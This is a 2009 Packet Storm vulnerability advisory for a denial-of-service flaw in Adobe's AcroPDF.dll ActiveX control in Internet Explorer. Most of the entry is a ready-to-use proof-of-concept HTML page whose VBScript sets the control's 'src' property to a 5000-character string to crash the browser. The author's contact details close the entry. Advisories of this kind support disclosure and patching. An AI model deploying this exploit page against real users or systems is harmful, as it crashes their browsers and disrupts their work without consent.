Adobe AcroPDF.dll Denial Of Service

2009-11-18T00:00:00
ID PACKETSTORM:82760
Type packetstorm
Reporter Beenu Arora
Modified 2009-11-18T00:00:00

Description

                                        
                                            ` Adobe browser document ActiveX DoS vulnerablity  
  
File: AcroPDF.dll  
  
Affected version : 7.0.5 . Later versions are also effected  
  
Description:  
  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
  
POC:  
Create a HTML file with following Code and test it on IE  
  
<html>  
Test Exploit page  
<object classid='clsid:CA8A9780-280D-  
11CF-A24D-444553540000' id='target' ></object>  
<script language='vbscript'>  
targetFile = "C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroPDF.dll"  
prototype = "Property Let src As String"  
memberName = "src"  
progid = "AcroPDFLib.AcroPDF"  
argCount = 1  
  
arg1=String(5000, "A")  
  
target.src = arg1  
  
</script>  
  
  
--   
Beenu Arora  
M.C.S.E. , C|EH  
+91-9911254288  
www.BeenuArora.com  
`